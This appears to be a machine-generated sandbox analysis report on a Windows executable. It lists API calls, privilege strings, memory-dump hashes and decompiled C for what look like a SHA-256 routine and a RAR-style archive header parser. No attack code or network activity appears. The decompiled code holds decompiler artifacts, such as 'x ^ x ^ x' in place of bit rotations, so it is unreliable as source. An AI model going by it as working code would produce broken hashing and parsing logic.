RemoveDirectoryW.KERNEL32(?), ref: 004069F3
DeleteFileW.KERNEL32(?), ref: 004069FB

Part of subcall function 00419DFE: __lock.LIBCMT ref: 00419E1C
Part of subcall function 00419DFE: ___sbh_find_block.LIBCMT ref: 00419E27
Part of subcall function 00419DFE: ___sbh_free_block.LIBCMT ref: 00419E36
Part of subcall function 00419DFE: RtlFreeHeap.NTDLL(00000000,00000000,0042D618,0000000C,0041E984,00000000,0042D8F0,0000000C,0041E9BE,00000000,0041A29B,?,00424CE6,00000004,0042DA90,0000000C), ref: 00419E66
Part of subcall function 00419DFE: GetLastError.KERNEL32(?,00424CE6,00000004,0042DA90,0000000C,0042092E,00000000,0041A2AA,00000000,00000000,00000000,?,0041E366,00000001,00000214), ref: 00419E77

Strings

UNC\, xrefs: 004067F7
SeCreateSymbolicLinkPrivilege, xrefs: 00406725
l*C, xrefs: 004069D2
\??\, xrefs: 004067D5
SeRestorePrivilege, xrefs: 0040671B

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorFileHandleLast_wcscpy$DirectoryProcessToken_wcslen$AdjustControlCurrentDeleteDeviceFreeH_prologHeapLookupOpenPrivilegePrivilegesRemoveValue___sbh_find_block___sbh_free_block__lock
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\$l*C
API String ID: 3709686777-1890167455
Opcode ID: 03488a64bd34f14eed700c6f483f60a54cc49b8752857f9888daa1340c510232
Instruction ID: 4cf615bd09123c222a0fdd8ad645ce7933f49139f0154fdd653e14ffd5bbb6e7
Opcode Fuzzy Hash: 03488a64bd34f14eed700c6f483f60a54cc49b8752857f9888daa1340c510232
Instruction Fuzzy Hash: 7AA1D571600214AFDB21DF64CC45FEA77B8AF04304F00856BF55AE7291E778AAA4CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004102E7, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E004102E7(signed int* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				char _v296;
				unsigned int* _t154;
				void* _t167;
				signed int _t183;
				signed int _t199;
				signed int _t227;
				signed int _t229;
				void* _t234;
				signed int _t236;
				void* _t243;

				if(__esi != 0) {
					_v296 = E0041CBC1( *(__esi[0xa]));
					_v292 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 4)));
					_v288 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 8)));
					_v284 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0xc)));
					_v280 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x10)));
					_v276 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x14)));
					_v272 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x18)));
					_v268 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x1c)));
					_v264 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x20)));
					_v260 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x24)));
					_v256 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x28)));
					_v252 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x2c)));
					_t229 = 0x30;
					_v248 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + _t229)));
					_v244 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x34)));
					_v240 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x38)));
					_v236 = E0041CBC1( *((intOrPtr*)(__esi[0xa] + 0x3c)));
					_t154 =  &_v240;
					_v8 = _t229;
					do {
						asm("rol edi, 0xe");
						asm("ror ebx, 0x7");
						asm("rol ecx, 0xf");
						asm("rol ebx, 0xd");
						_t234 = ( *(_t154 - 0x34) ^  *(_t154 - 0x34) ^  *(_t154 - 0x34) >> 0x00000003) + ( *_t154 ^  *_t154 ^  *_t154 >> 0x0000000a) +  *((intOrPtr*)(_t154 - 0x38));
						_t154 =  &(_t154[1]);
						_t40 =  &_v8;
						 *_t40 = _v8 - 1;
						_t154[1] = _t234 +  *((intOrPtr*)(_t154 - 0x18));
					} while ( *_t40 != 0);
					_t236 =  *__esi;
					_t227 = __esi[4];
					_v8 = _v8 & 0x00000000;
					_v36 = __esi[1];
					_v32 = __esi[2];
					_v28 = __esi[3];
					_v20 = __esi[5];
					_v16 = __esi[6];
					_v40 = _t236;
					_v12 = __esi[7];
					do {
						asm("ror eax, 0xb");
						asm("rol ecx, 0x7");
						asm("ror ecx, 0x6");
						_t62 = _v8 + 0x42ab90; // 0x428a2f98
						_v8 = _v8 + 4;
						_t167 = (_t227 ^ _t227 ^ _t227) + ( !_t227 & _v16 ^ _v20 & _t227) +  *_t62 +  *((intOrPtr*)(_t243 + _v8 - 0x124)) + _v12;
						_v12 = _v16;
						_v16 = _v20;
						_v20 = _t227;
						_t227 = _t167 + _v28;
						asm("ror ecx, 0xd");
						asm("rol ebx, 0xa");
						asm("ror ebx, 0x2");
						_t75 =  &_v36; // 0x405a2b
						_t77 =  &_v36; // 0x405a2b
						_t81 =  &_v36; // 0x405a2b
						_t199 =  *_t81;
						_v28 = _v32;
						_v36 = _v40;
						_t236 = (_t236 ^ _t236 ^ _t236) + (( *_t75 ^ _t236) & _v32 ^  *_t77 & _v40) + _t167;
						_v32 = _t199;
						_v40 = _t236;
					} while (_v8 < 0x100);
					_t88 =  &_v36; // 0x405a2b
					 *__esi =  *__esi + _t236;
					__esi[1] = __esi[1] +  *_t88;
					__esi[2] = __esi[2] + _t199;
					__esi[3] = __esi[3] + _v28;
					__esi[4] = __esi[4] + _t227;
					__esi[5] = __esi[5] + _v20;
					__esi[6] = __esi[6] + _v16;
					_t183 = __esi[7] + _v12;
					__esi[7] = _t183;
					return _t183;
				} else {
					E0040CC38( &_v40, 0x20);
					return E0040CC38( &_v296, 0x100);
				}
			}

0x004102f2
0x0041031e
0x00410331
0x00410344
0x00410357
0x0041036a
0x0041037d
0x00410390
0x004103a3
0x004103b6
0x004103c9
0x004103dc
0x004103ef
0x004103fa
0x00410404
0x00410417
0x0041042a
0x0041043d
0x00410446
0x0041044c
0x0041044f
0x00410456
0x0041045e
0x00410467
0x0041046c
0x00410478
0x0041047b
0x00410481
0x00410481
0x00410484
0x00410484
0x0041048c
0x0041048e
0x00410491
0x00410495
0x0041049b
0x004104a1
0x004104a7
0x004104ad
0x004104b3
0x004104b6
0x004104b9
0x004104be
0x004104c3
0x004104cc
0x004104df
0x004104e5
0x004104f3
0x004104f6
0x004104fc
0x00410504
0x00410507
0x0041050c
0x0041050f
0x00410516
0x0041051b
0x00410523
0x00410537
0x00410537
0x0041053a
0x00410540
0x00410543
0x00410546
0x00410549
0x00410549
0x00410554
0x00410559
0x00410563
0x0041056b
0x00410576
0x0041057e
0x00410589
0x00410594
0x0041059a
0x0041059d
0x004105a2
0x004102f4
0x004102fa
0x00410311
0x00410311

APIs

__byteswap_ulong.LIBCMT ref: 00410319
__byteswap_ulong.LIBCMT ref: 0041032C
__byteswap_ulong.LIBCMT ref: 0041033F
__byteswap_ulong.LIBCMT ref: 00410352
__byteswap_ulong.LIBCMT ref: 00410365
__byteswap_ulong.LIBCMT ref: 00410378
__byteswap_ulong.LIBCMT ref: 0041038B
__byteswap_ulong.LIBCMT ref: 0041039E
__byteswap_ulong.LIBCMT ref: 004103B1
__byteswap_ulong.LIBCMT ref: 004103C4
__byteswap_ulong.LIBCMT ref: 004103D7
__byteswap_ulong.LIBCMT ref: 004103EA
__byteswap_ulong.LIBCMT ref: 004103FF
__byteswap_ulong.LIBCMT ref: 00410412
__byteswap_ulong.LIBCMT ref: 00410425
__byteswap_ulong.LIBCMT ref: 00410438

Strings

+Z@, xrefs: 0041051B, 00410523, 00410537, 00410554

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __byteswap_ulong
String ID: +Z@
API String ID: 2309504477-4258366557
Opcode ID: 95e7ca9588391554023de5706d22299a6bc0552d772217a09421b85d50183a30
Instruction ID: bcd75b782bc085310d1f77f83ccc04f78997259106af021108499cf8d6d7e8a1
Opcode Fuzzy Hash: 95e7ca9588391554023de5706d22299a6bc0552d772217a09421b85d50183a30
Instruction Fuzzy Hash: 2C911B71A006048FCB24DF59D882A9DBBF1FF48308F0445AEE55AE7722D774A994CF48

Uniqueness

Uniqueness Score: -1.00%

Function 00402ECC, Relevance: 12.8, APIs: 3, Strings: 4, Instructions: 544
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00402ECC(intOrPtr* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t225;
				signed int _t229;
				void* _t231;
				void* _t232;
				unsigned int _t235;
				void* _t240;
				intOrPtr _t243;
				signed char _t246;
				char _t247;
				void* _t258;
				void* _t261;
				signed int _t267;
				signed int _t268;
				intOrPtr _t269;
				signed int* _t270;
				signed char _t271;
				void* _t274;
				signed int _t295;
				signed int _t306;
				signed int _t310;
				signed int _t327;
				signed char _t329;
				signed int _t335;
				void* _t343;
				void* _t346;
				signed int _t355;
				intOrPtr* _t360;
				signed int _t374;
				signed int _t382;
				signed int _t400;
				signed int _t404;
				signed int* _t412;
				unsigned int _t413;
				char _t416;
				void* _t434;
				void* _t443;
				signed int _t460;
				void* _t461;
				signed int _t462;
				signed char _t464;
				void* _t468;
				void* _t470;
				void* _t473;
				void* _t474;
				intOrPtr _t481;
				void* _t482;
				void* _t484;
				void* _t485;
				signed int _t494;
				void* _t497;

				_t485 = _t484 - 0x50;
				E00419DD4(E004290C6, _t482);
				E0041A3E0(0x2070);
				_push(_t479);
				_t360 = __ecx;
				E0040B3F7(_t482 + 0x28, __ecx);
				_t466 = 0;
				 *((intOrPtr*)(_t482 - 4)) = 0;
				if( *((char*)(__ecx + 0xa23c)) == 0) {
					L7:
					 *((char*)(_t482 + 0x53)) = 0;
					L12:
					__eflags = E0040B189(_t482 + 0x28, _t466, 7) - 7;
					if(__eflags < 0) {
						L5:
						E00401C1F(_t360, _t460, _t496);
						L6:
						_t497 =  *(_t482 + 0x28) - _t466;
						L88:
						if(_t497 != 0) {
							_push( *(_t482 + 0x28));
							E00419DFE(_t360, _t466, _t479, _t497);
						}
						_t225 = 0;
						L91:
						 *[fs:0x0] =  *((intOrPtr*)(_t482 - 0xc));
						return _t225;
					}
					 *(_t360 + 0x573c) = 0;
					_t479 = _t360 + 0x572c;
					 *_t479 = E0040B270(_t482 + 0x28);
					_t466 = E0040B331(_t482 + 0x28, 4);
					_t229 = E0040B2CE(_t460);
					__eflags = _t229 | _t460;
					if((_t229 | _t460) == 0) {
						L86:
						E00401C68(_t360);
						L87:
						__eflags =  *(_t482 + 0x28);
						goto L88;
					}
					__eflags = _t466;
					if(_t466 == 0) {
						goto L86;
					}
					_t231 = _t229 + _t466;
					_t30 = _t231 - 3; // -3
					_t374 = _t30;
					_t31 = _t231 + 4; // 0x4
					_t466 = _t31;
					__eflags = _t374;
					if(_t374 < 0) {
						goto L86;
					}
					__eflags = _t466 - 7;
					if(_t466 < 7) {
						goto L86;
					}
					_t232 = E0040B189(_t482 + 0x28, _t466, _t374);
					__eflags =  *((intOrPtr*)(_t482 + 0x3c)) - _t466;
					if(__eflags >= 0) {
						 *(_t482 + 0x4c) = E0040B3D7(_t232, _t482 + 0x28);
						 *((intOrPtr*)(_t360 + 0x5730)) = E0040B2CE(_t460);
						_t235 = E0040B2CE(_t460);
						 *(_t360 + 0x5734) = _t235;
						 *(_t360 + 0x573c) = _t235 >> 0x00000002 & 0x00000001;
						 *((intOrPtr*)(_t360 + 0x5724)) =  *((intOrPtr*)(_t360 + 0x5730));
						__eflags =  *_t479 -  *(_t482 + 0x4c);
						 *(_t360 + 0x5738) = _t466;
						 *((char*)(_t482 + 0x4b)) =  *_t479 !=  *(_t482 + 0x4c);
						__eflags =  *((char*)(_t482 + 0x4b));
						if( *((char*)(_t482 + 0x4b)) == 0) {
							L22:
							_t466 = 0;
							__eflags =  *(_t360 + 0x5734) & 0x00000001;
							 *(_t482 + 0x18) = 0;
							 *(_t482 + 0x1c) = 0;
							if(( *(_t360 + 0x5734) & 0x00000001) == 0) {
								L27:
								__eflags =  *(_t360 + 0x5734) & 0x00000002;
								 *(_t482 + 0x20) = _t466;
								 *(_t482 + 0x24) = _t466;
								if(( *(_t360 + 0x5734) & 0x00000002) != 0) {
									 *(_t482 + 0x20) = E0040B2CE(_t460);
									 *(_t482 + 0x24) = _t460;
								}
								_t240 = E004010D3(_t360,  *(_t360 + 0x5738));
								asm("adc ecx, [ebx+0xa224]");
								asm("adc ecx, [ebp+0x24]");
								 *((intOrPtr*)(_t360 + 0xa228)) = _t240 +  *((intOrPtr*)(_t360 + 0xa220)) +  *(_t482 + 0x20);
								_t243 =  *((intOrPtr*)(_t360 + 0x5730));
								 *((intOrPtr*)(_t360 + 0xa22c)) = 0;
								__eflags = _t243 - 1;
								if(__eflags == 0) {
									_t468 = _t360 + 0x5750;
									E00409886(_t468);
									_t382 = 5;
									memcpy(_t468, _t479, _t382 << 2);
									_t466 = _t479 + _t382 + _t382;
									_t246 = E0040B2CE(_t460);
									 *(_t360 + 0xa235) = _t246 & 0x00000001;
									 *(_t360 + 0xa234) = _t246 >> 0x00000002 & 0x00000001;
									 *(_t360 + 0xa237) = _t246 >> 0x00000004 & 0x00000001;
									 *(_t360 + 0xa23b) = _t246 >> 0x00000003 & 0x00000001;
									 *((char*)(_t360 + 0xa238)) = 0;
									 *((char*)(_t360 + 0xa23a)) = 1;
									__eflags = _t246 & 0x00000002;
									if((_t246 & 0x00000002) == 0) {
										_t198 = _t360 + 0xa258;
										 *_t198 =  *(_t360 + 0xa258) & 0x00000000;
										__eflags =  *_t198;
									} else {
										 *(_t360 + 0xa258) = E0040B2CE(_t460);
									}
									__eflags =  *(_t360 + 0xa235);
									if( *(_t360 + 0xa235) == 0) {
										L77:
										_t247 = 0;
										__eflags = 0;
										goto L78;
									} else {
										__eflags =  *(_t360 + 0xa258);
										if( *(_t360 + 0xa258) != 0) {
											goto L77;
										}
										_t247 = 1;
										L78:
										 *((char*)(_t360 + 0xa239)) = _t247;
										__eflags =  *(_t482 + 0x18) |  *(_t482 + 0x1c);
										if(( *(_t482 + 0x18) |  *(_t482 + 0x1c)) != 0) {
											_push(_t360 + 0x5750);
											_push( *(_t482 + 0x18));
											_push(_t482 + 0x28);
											E00402716(_t360, _t460);
										}
										L80:
										__eflags =  *((intOrPtr*)(_t360 + 0xa22c)) -  *((intOrPtr*)(_t360 + 0xa224));
										if(__eflags > 0) {
											L83:
											__eflags =  *(_t482 + 0x28);
											_t481 =  *((intOrPtr*)(_t482 + 0x3c));
											if(__eflags != 0) {
												_push( *(_t482 + 0x28));
												E00419DFE(_t360, _t466, _t481, __eflags);
											}
											_t225 = _t481;
											goto L91;
										}
										if(__eflags < 0) {
											goto L86;
										}
										__eflags =  *((intOrPtr*)(_t360 + 0xa228)) -  *((intOrPtr*)(_t360 + 0xa220));
										if( *((intOrPtr*)(_t360 + 0xa228)) <=  *((intOrPtr*)(_t360 + 0xa220))) {
											goto L86;
										}
										goto L83;
									}
								}
								if(__eflags <= 0) {
									goto L80;
								}
								__eflags = _t243 - 3;
								if(_t243 <= 3) {
									__eflags = _t243 - 2;
									_t258 = _t360 + 0x57c8;
									if(_t243 != 2) {
										_t258 = _t360 + 0x7b08;
									}
									_t470 = _t258;
									 *(_t482 + 0x4c) = _t258;
									E004098B1(_t470, 0);
									_t400 = 5;
									_t261 = memcpy(_t470, _t479, _t400 << 2);
									__eflags =  *((intOrPtr*)(_t360 + 0x5730)) - 2;
									_t479 =  *(_t482 + 0x4c);
									 *(_t479 + 0x1048) = _t261;
									 *((char*)(_t482 + 0x53)) =  *((intOrPtr*)(_t360 + 0x5730)) == 2;
									 *((char*)(_t479 + 0x10e9)) = 1;
									 *(_t479 + 0x104c) =  *(_t482 + 0x24);
									 *(_t479 + 0x1084) = E0040B2CE(_t460);
									 *(_t479 + 0x1050) = E0040B2CE(_t460);
									_t267 =  *(_t479 + 0x1084) >> 0x00000003 & 0x00000001;
									__eflags = _t267;
									 *(_t479 + 0x1054) = _t460;
									 *(_t479 + 0x108a) = _t267;
									if(_t267 != 0) {
										 *(_t479 + 0x1050) = 0x7fffffff;
										 *(_t479 + 0x1054) = 0x7fffffff;
									}
									_t268 =  *(_t479 + 0x104c);
									_t404 =  *(_t479 + 0x1054);
									__eflags = _t268 - _t404;
									_t461 =  *(_t479 + 0x1048);
									_t473 =  *(_t479 + 0x1050);
									if(__eflags < 0) {
										L48:
										_t461 = _t473;
										_t268 = _t404;
										goto L49;
									} else {
										if(__eflags > 0) {
											L49:
											 *(_t479 + 0x1058) = _t461;
											 *(_t479 + 0x105c) = _t268;
											_t269 = E0040B2CE(_t461);
											__eflags =  *(_t479 + 0x1084) & 0x00000002;
											 *((intOrPtr*)(_t479 + 0x1c)) = _t269;
											if(( *(_t479 + 0x1084) & 0x00000002) != 0) {
												E00410F07(_t479 + 0x1030, _t461, E0040B270(_t482 + 0x28), 0);
											}
											_t270 = _t479 + 0x1060;
											 *_t270 =  *_t270 & 0x00000000;
											__eflags =  *(_t479 + 0x1084) & 0x00000004;
											if(( *(_t479 + 0x1084) & 0x00000004) != 0) {
												 *_t270 = 2;
												 *((intOrPtr*)(_t479 + 0x1064)) = E0040B270(_t482 + 0x28);
											}
											 *(_t479 + 0x10f0) =  *(_t479 + 0x10f0) & 0x00000000;
											_t271 = E0040B2CE(_t461);
											 *(_t482 + 0x4c) = _t271;
											 *(_t479 + 0x1a) = _t271 >> 0x00000007 & 0x00000007;
											 *(_t479 + 0x19) = _t271 & 0x0000003f;
											 *((char*)(_t479 + 0x18)) = E0040B2CE(_t461);
											_t274 = E0040B2CE(_t461);
											_t462 =  *((intOrPtr*)(_t479 + 0x18));
											_t474 = _t274;
											_t412 = _t479 + 0x10ec;
											 *(_t479 + 0x10e8) =  *(_t360 + 0x5734) >> 0x00000006 & 0x00000001;
											 *_t412 = 2;
											__eflags = _t462 - 1;
											if(_t462 != 1) {
												__eflags = _t462;
												if(_t462 == 0) {
													 *_t412 =  *_t412 & 0x00000000;
													__eflags =  *_t412;
												}
											} else {
												 *_t412 = 1;
											}
											_t413 =  *(_t479 + 8);
											 *(_t479 + 0x1088) = _t413 >> 0x00000003 & 0x00000001;
											__eflags =  *((char*)(_t482 + 0x53));
											 *(_t479 + 0x1089) = _t413 >> 0x00000004 & 0x00000001;
											 *(_t479 + 0x10ea) = _t413 >> 0x00000005 & 0x00000001;
											if( *((char*)(_t482 + 0x53)) == 0) {
												L60:
												_t416 = 0;
												__eflags = 0;
												goto L61;
											} else {
												__eflags =  *(_t482 + 0x4c) & 0x00000040;
												if(( *(_t482 + 0x4c) & 0x00000040) == 0) {
													goto L60;
												}
												_t416 = 1;
												L61:
												 *((char*)(_t479 + 0x10e0)) = _t416;
												_t464 =  *(_t479 + 0x1084) & 0x00000001;
												asm("sbb ecx, ecx");
												asm("sbb eax, eax");
												 *(_t479 + 0x10e4) =  !( ~(_t464 & 0x000000ff)) & 0x00020000 << ( *(_t482 + 0x4c) >> 0x0000000a & 0x0000000f);
												 *(_t479 + 0x10e1) = _t464;
												 *(_t479 + 0x108c) =  ~( *(_t479 + 0x108b) & 0x000000ff) & 0x00000005;
												__eflags = _t474 - 0x1fff;
												if(_t474 >= 0x1fff) {
													_t474 = 0x1fff;
												}
												E0040B357(_t482 + 0x28, _t482 - 0x207c, _t474);
												 *((char*)(_t482 + _t474 - 0x207c)) = 0;
												_t466 = _t479 + 0x20;
												E00411817(_t482 + 0x28, _t482 - 0x207c, _t479 + 0x20, 0x7ff);
												__eflags =  *(_t482 + 0x18) |  *(_t482 + 0x1c);
												if(( *(_t482 + 0x18) |  *(_t482 + 0x1c)) != 0) {
													_push(_t479);
													_push( *(_t482 + 0x18));
													_push(_t482 + 0x28);
													E00402716(_t360, _t464);
												}
												__eflags =  *((char*)(_t482 + 0x53));
												if( *((char*)(_t482 + 0x53)) == 0) {
													_t295 = E0041A311(_t466, "CMT");
													__eflags = _t295;
													if(_t295 == 0) {
														 *((char*)(_t360 + 0xa236)) = 1;
													}
												} else {
													E00401ABA(_t360, _t479);
												}
												__eflags =  *((char*)(_t482 + 0x4b));
												if( *((char*)(_t482 + 0x4b)) != 0) {
													E004062C8(0x1a, _t360 + 0x1e, _t466);
												}
												goto L80;
											}
										}
										__eflags = _t461 - _t473;
										if(_t461 > _t473) {
											goto L49;
										}
										goto L48;
									}
								}
								__eflags = _t243 - 4;
								if(_t243 == 4) {
									_t434 = 5;
									memcpy(_t360 + 0x5790, _t479, 0 << 2);
									_t466 = _t479 + _t434 + _t434;
									_t306 = E0040B2CE(_t460);
									__eflags = _t306;
									if(_t306 <= 0) {
										 *(_t360 + 0x57a4) = E0040B2CE(_t460) & 0x00000001;
										_t310 = E0040B223(_t482 + 0x28) & 0x000000ff;
										 *(_t360 + 0x57a8) = _t310;
										__eflags = _t310 - 0x18;
										if(_t310 > 0x18) {
											goto L36;
										}
										E0040B357(_t482 + 0x28, _t360 + 0x57ac, 0x10);
										__eflags =  *(_t360 + 0x57a4);
										if( *(_t360 + 0x57a4) != 0) {
											_t479 = _t360 + 0x57bc;
											E0040B357(_t482 + 0x28, _t360 + 0x57bc, 8);
											E0040B357(_t482 + 0x28, _t482 + 0x4c, 4);
											E004102A1(_t482 - 0x7c);
											E004105A3(_t482 - 0x7c, _t360 + 0x57bc, 8);
											E0041061C(_t482 + 0x28, _t460, __eflags, _t482 - 0x7c, _t482);
											_t327 = E0041A4F4(_t482 + 0x4c, _t482, 4);
											asm("sbb al, al");
											_t329 =  ~_t327 + 1;
											__eflags = _t329;
											 *(_t360 + 0x57a4) = _t329;
										}
										 *((char*)(_t360 + 0xa23c)) = 1;
										goto L80;
									}
									L36:
									E00401C8B(_t360, _t360 + 0x1e);
									goto L87;
								}
								__eflags = _t243 - 5;
								if(_t243 == 5) {
									_t443 = _t243;
									memcpy(_t360 + 0x7ac8, _t479, 0 << 2);
									_t466 = _t479 + _t443 + _t443;
									 *(_t360 + 0x7ae4) = E0040B2CE(_t460) & 0x00000001;
									 *((char*)(_t360 + 0x7ae7)) = 0;
									 *((char*)(_t360 + 0x7ae5)) = 0;
									 *((char*)(_t360 + 0x7ae6)) = 0;
								}
								goto L80;
							}
							 *(_t482 + 0x18) = E0040B2CE(_t460);
							_t335 =  *(_t360 + 0x5738);
							 *(_t482 + 0x1c) = _t460;
							__eflags = _t460;
							if(__eflags < 0) {
								goto L27;
							}
							if(__eflags > 0) {
								L26:
								E00401C68(_t360);
								goto L6;
							}
							__eflags =  *(_t482 + 0x18) - _t335;
							if(__eflags < 0) {
								goto L27;
							}
							goto L26;
						}
						E00401C68(_t360);
						 *((char*)(_t360 + 0xa244)) = 1;
						E00406222(0x432a6c, 3);
						__eflags =  *((char*)(_t482 + 0x53));
						if( *((char*)(_t482 + 0x53)) == 0) {
							goto L22;
						} else {
							E004062C8(4, _t360 + 0x1e, _t360 + 0x1e);
							 *((char*)(_t360 + 0xa245)) = 1;
							goto L87;
						}
					} else {
						E00401C1F(_t360, _t460, __eflags);
						goto L87;
					}
				}
				_t460 =  *(__ecx + 0xa224);
				_t343 =  *((intOrPtr*)(__ecx + 0xa240)) + 8;
				asm("adc ecx, edi");
				_t494 = _t460;
				if(_t494 < 0 || _t494 <= 0 &&  *((intOrPtr*)(__ecx + 0xa220)) <= _t343) {
					goto L7;
				} else {
					 *((char*)(_t482 + 0x53)) = 1;
					E00401BBF(_t360);
					_t346 =  *((intOrPtr*)( *_t360 + 8))(_t482 + 0x10, 0x10);
					_t496 = _t346 - 0x10;
					if(_t346 == 0x10) {
						_t479 = _t360 + 0x1024;
						E00405F4F(_t479, _t460, _t466, 5,  *((intOrPtr*)(_t360 + 0x5704)) + 0x4020, _t360 + 0x57ac, _t482 + 0x10,  *(_t360 + 0x57a8), _t466, _t482 + 0x20);
						__eflags =  *(_t360 + 0x57a4);
						if( *(_t360 + 0x57a4) == 0) {
							L11:
							 *(_t482 + 0x44) = _t479;
							goto L12;
						}
						_t355 = E0041A4F4(_t482 + 0x20, _t360 + 0x57bc, 8);
						_t485 = _t485 + 0xc;
						__eflags = _t355;
						if(_t355 == 0) {
							goto L11;
						} else {
							E004012DD(6, _t360 + 0x1e);
							 *((char*)(_t360 + 0xa245)) = 1;
							E00406222(0x432a6c, 0xb);
							goto L6;
						}
					}
					goto L5;
				}
			}

0x00402ecd
0x00402ed5
0x00402edf
0x00402ee5
0x00402ee6
0x00402eed
0x00402ef2
0x00402efb
0x00402efe
0x00402f4f
0x00402f4f
0x00402fcf
0x00402fd9
0x00402fdc
0x00402f40
0x00402f42
0x00402f47
0x00402f47
0x00403620
0x00403620
0x00403622
0x00403625
0x0040362a
0x0040362b
0x0040362d
0x00403633
0x0040363e
0x0040363e
0x00402fe5
0x00402fec
0x00402ffc
0x00403006
0x00403008
0x0040300f
0x00403011
0x00403615
0x00403617
0x0040361c
0x0040361c
0x00000000
0x0040361c
0x00403017
0x00403019
0x00000000
0x00000000
0x0040301f
0x00403021
0x00403021
0x00403024
0x00403024
0x00403027
0x00403029
0x00000000
0x00000000
0x0040302f
0x00403032
0x00000000
0x00000000
0x0040303c
0x00403041
0x00403044
0x0040305d
0x00403068
0x0040306e
0x00403073
0x0040307e
0x0040308a
0x00403093
0x00403095
0x0040309b
0x0040309f
0x004030a3
0x004030dd
0x004030dd
0x004030df
0x004030e6
0x004030e9
0x004030ec
0x0040311b
0x0040311b
0x00403122
0x00403125
0x00403128
0x00403132
0x00403135
0x00403135
0x00403140
0x0040314d
0x00403156
0x00403159
0x0040315f
0x00403165
0x0040316b
0x0040316e
0x0040352d
0x00403535
0x0040353c
0x0040353d
0x0040353d
0x00403542
0x0040354c
0x0040355a
0x00403568
0x00403576
0x0040357c
0x00403583
0x0040358a
0x0040358c
0x0040359e
0x0040359e
0x0040359e
0x0040358e
0x00403596
0x00403596
0x004035a5
0x004035ac
0x004035bc
0x004035bc
0x004035bc
0x00000000
0x004035ae
0x004035ae
0x004035b5
0x00000000
0x00000000
0x004035b9
0x004035be
0x004035be
0x004035c7
0x004035ca
0x004035d2
0x004035d3
0x004035d9
0x004035dc
0x004035dc
0x004035e1
0x004035e7
0x004035ed
0x004035ff
0x004035ff
0x00403603
0x00403606
0x00403608
0x0040360b
0x00403610
0x00403611
0x00000000
0x00403611
0x004035ef
0x00000000
0x00000000
0x004035f7
0x004035fd
0x00000000
0x00000000
0x00000000
0x004035fd
0x004035ac
0x00403174
0x00000000
0x00000000
0x0040317a
0x0040317d
0x00403297
0x0040329a
0x004032a0
0x004032a2
0x004032a2
0x004032a8
0x004032ae
0x004032b1
0x004032bb
0x004032bc
0x004032be
0x004032c5
0x004032c8
0x004032d4
0x004032d8
0x004032df
0x004032ed
0x004032f8
0x00403307
0x00403307
0x00403309
0x0040330f
0x00403315
0x0040331c
0x00403322
0x00403322
0x00403328
0x0040332e
0x00403334
0x00403336
0x0040333c
0x00403342
0x0040334a
0x0040334a
0x0040334c
0x00000000
0x00403344
0x00403344
0x0040334e
0x00403351
0x00403357
0x0040335d
0x00403362
0x00403369
0x0040336c
0x0040337f
0x0040337f
0x00403384
0x0040338a
0x0040338d
0x00403394
0x00403399
0x004033a4
0x004033a4
0x004033aa
0x004033b4
0x004033c1
0x004033c4
0x004033cc
0x004033d7
0x004033da
0x004033df
0x004033e2
0x004033ef
0x004033f5
0x004033fb
0x00403401
0x00403404
0x0040340e
0x00403410
0x00403412
0x00403412
0x00403412
0x00403406
0x00403406
0x00403406
0x00403415
0x0040341f
0x00403432
0x00403436
0x0040343c
0x00403442
0x0040344f
0x0040344f
0x0040344f
0x00000000
0x00403444
0x00403444
0x00403448
0x00000000
0x00000000
0x0040344c
0x00403451
0x00403457
0x00403466
0x00403475
0x00403484
0x00403486
0x00403494
0x0040349a
0x004034a0
0x004034a2
0x004034a4
0x004034a4
0x004034b1
0x004034b6
0x004034c3
0x004034ce
0x004034d6
0x004034d9
0x004034db
0x004034dc
0x004034e2
0x004034e5
0x004034e5
0x004034ea
0x004034ee
0x00403500
0x00403507
0x00403509
0x0040350b
0x0040350b
0x004034f0
0x004034f3
0x004034f3
0x00403512
0x00403516
0x00403523
0x00403523
0x00000000
0x00403516
